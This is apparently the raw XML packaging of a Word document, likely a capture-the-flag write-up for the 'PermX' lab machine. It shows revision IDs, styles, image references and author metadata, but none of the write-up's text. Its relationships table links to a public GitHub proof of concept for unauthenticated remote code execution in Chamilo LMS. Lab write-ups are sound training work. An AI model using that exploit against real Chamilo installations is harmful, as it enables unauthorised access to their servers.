    <w:rsid w:val="00B147C8"/>
    <w:rsid w:val="00B218C3"/>
    <w:rsid w:val="00B459FC"/>
    <w:rsid w:val="00B46FA3"/>
    <w:rsid w:val="00B54AC5"/>
    <w:rsid w:val="00B54B26"/>
    <w:rsid w:val="00B56985"/>
    <w:rsid w:val="00B57EB0"/>
    <w:rsid w:val="00B67F88"/>
    <w:rsid w:val="00B85FC9"/>
    <w:rsid w:val="00BB59B5"/>
    <w:rsid w:val="00BE4C42"/>
    <w:rsid w:val="00BE6649"/>
    <w:rsid w:val="00C33616"/>
    <w:rsid w:val="00C47253"/>
    <w:rsid w:val="00C5730D"/>
    <w:rsid w:val="00C657F4"/>
    <w:rsid w:val="00C86EEA"/>
    <w:rsid w:val="00C873D0"/>
    <w:rsid w:val="00C910A2"/>
    <w:rsid w:val="00CB07F3"/>
    <w:rsid w:val="00CC2E09"/>
    <w:rsid w:val="00CC7B18"/>
    <w:rsid w:val="00CD4D5E"/>
    <w:rsid w:val="00CD62FC"/>
    <w:rsid w:val="00CD6B6D"/>
    <w:rsid w:val="00CE0794"/>
    <w:rsid w:val="00CF6502"/>
    <w:rsid w:val="00D06E7B"/>
    <w:rsid w:val="00D07551"/>
    <w:rsid w:val="00D10851"/>
    <w:rsid w:val="00D14791"/>
    <w:rsid w:val="00D14ACD"/>
    <w:rsid w:val="00D47D70"/>
    <w:rsid w:val="00D514D4"/>
    <w:rsid w:val="00D52B88"/>
    <w:rsid w:val="00D54CD5"/>
    <w:rsid w:val="00D6284A"/>
    <w:rsid w:val="00D81815"/>
    <w:rsid w:val="00D81938"/>
    <w:rsid w:val="00D82556"/>
    <w:rsid w:val="00D8562F"/>
    <w:rsid w:val="00D86CFE"/>
    <w:rsid w:val="00DA2FB5"/>
    <w:rsid w:val="00DB7613"/>
    <w:rsid w:val="00DC7B0A"/>
    <w:rsid w:val="00DD076D"/>
    <w:rsid w:val="00DE25D1"/>
    <w:rsid w:val="00DE718C"/>
    <w:rsid w:val="00DF0FC1"/>
    <w:rsid w:val="00DF3E69"/>
    <w:rsid w:val="00E05D25"/>
    <w:rsid w:val="00E060D4"/>
    <w:rsid w:val="00E10CD5"/>
    <w:rsid w:val="00E14FB4"/>
    <w:rsid w:val="00E30C0B"/>
    <w:rsid w:val="00E3544A"/>
    <w:rsid w:val="00E463A7"/>
    <w:rsid w:val="00E54840"/>
    <w:rsid w:val="00E54FC9"/>
    <w:rsid w:val="00E63FB2"/>
    <w:rsid w:val="00E66D52"/>
    <w:rsid w:val="00E674A3"/>
    <w:rsid w:val="00E82727"/>
    <w:rsid w:val="00EB228D"/>
    <w:rsid w:val="00EC54DE"/>
    <w:rsid w:val="00EC5F7C"/>
    <w:rsid w:val="00EE428C"/>
    <w:rsid w:val="00EF6388"/>
    <w:rsid w:val="00EF6F32"/>
    <w:rsid w:val="00F11550"/>
    <w:rsid w:val="00F1764A"/>
    <w:rsid w:val="00F244FC"/>
    <w:rsid w:val="00F27CD5"/>
    <w:rsid w:val="00F321EF"/>
    <w:rsid w:val="00F33445"/>
    <w:rsid w:val="00F378AF"/>
    <w:rsid w:val="00F72565"/>
    <w:rsid w:val="00F72B59"/>
    <w:rsid w:val="00F77248"/>
    <w:rsid w:val="00F83A09"/>
    <w:rsid w:val="00FD2D21"/>
    <w:rsid w:val="00FE0E28"/>
    <w:rsid w:val="00FE1F21"/>
    <w:rsid w:val="00FE265F"/>
    <w:rsid w:val="00FE4AF0"/>
    <w:rsid w:val="00FF2614"/>
    <w:rsid w:val="00FF3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1AD5F5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8BE99897-B388-4F81-B071-DAE53C0F7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151D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00B147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47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47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47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47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47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47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47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47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DE">
    <w:name w:val="CODE"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CODEChar"/>
    <w:qFormat/>
    <w:rsid w:val="00406B6D"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New"/>
      <w:kern w:val="0"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CODEChar">
    <w:name w:val="CODE Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CODE"/>
    <w:rsid w:val="00406B6D"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New"/>
      <w:kern w:val="0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B147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147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47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47C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47C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47C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47C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47C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47C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147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47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47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147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147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147C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147C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147C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47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47C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147C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147C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47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20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55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0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20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8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06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13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10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48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02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88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6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685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15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1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390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5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733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50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9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49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83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55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83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79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5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7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4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94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8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1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24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24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526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8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6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291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5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59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29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6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695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78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42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61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9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7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92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14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56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9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99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4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49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47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6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19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034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70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85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976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36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22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299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26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23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48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72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63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66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25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60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7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45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69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9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37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263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21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9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3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0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5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9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6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955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4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21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7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0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5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23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8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52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96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1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158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98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53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29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96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45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33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5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93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99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9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4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32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7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26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761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85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947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8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1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80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168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45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0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45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6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86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7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1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61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64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34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4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3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49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32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2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85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3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93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44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70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08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22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16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52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72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63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3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69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21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7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03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86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2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31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5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13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67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3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85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31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87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0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22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16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00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13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1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2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70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3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02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78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8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81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14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3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97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93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5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54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29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40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10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60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53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61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4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4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9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03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58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8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94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26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60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55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2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9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08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93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96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5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03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83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474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5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12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86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2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77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4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2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51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21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2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08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09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48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4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2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17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40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1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61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553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4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66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76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52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733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26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86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23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8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16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09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90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59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10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25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52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3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7.tmp"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.tmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.tmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.tmp"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.tmp"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.tmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:mtz@permx.htb" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.tm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github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc.git" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.tmp"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.tmp"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.tmp"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.tmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.tm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9188</TotalTime>
  <Pages>8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Graf</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ken Graf</cp:lastModifiedBy>
  <cp:revision>231</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-17T12:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-24T17:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>